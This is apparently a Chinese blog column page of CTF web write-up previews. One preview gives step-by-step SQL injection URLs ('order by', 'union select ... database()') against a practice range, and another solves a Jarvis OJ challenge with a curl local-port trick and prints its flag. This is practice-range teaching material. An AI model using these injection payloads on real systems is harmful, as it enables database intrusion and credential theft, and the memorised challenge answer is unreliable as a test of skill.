CTF-web刷题记录
各种CTF题的WP,补充知识点
Bell0ne_
用心学安全
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
一次简单的通过sql注入获取目标用户名和密码的流程
靶场环境:封神台 第一步 http://59.63.200.79:8003/?id=2-1 验证注入点存在 第二步 http://59.63.200.79:8003/?id=1 order by 1/2/… 查询到长度为2 第三步 http://59.63.200.79:8003/?id=9.99 union select 1,2 验证数据返回点,返回值为2 第四步 http://59.63.200.79:8003/?id=9.99 union select 1,database() 查询到库名为maosh原创 2020-10-04 21:36:51 · 1611 阅读 · 0 评论 -
Jarvis_Web 刷题记录_Bellone北洛
这里写自定义目录标题1.Port512.LOCALHOST3.Login 1.Port51 URL:http://web.jarvisoj.com:32770/ 网页截图: 解决方法: 使用curl命令修改port curl http://web.jarvisoj.com:32770/ --local-port 51 Flag:PCTF{M45t3r_oF_CuRl} 2.LOCALHOST URL:http://web.jarvisoj.com:32774/ 网页截图: 解决方法: burp抓包修改X原创 2020-09-28 20:31:30 · 269 阅读 · 0 评论
分享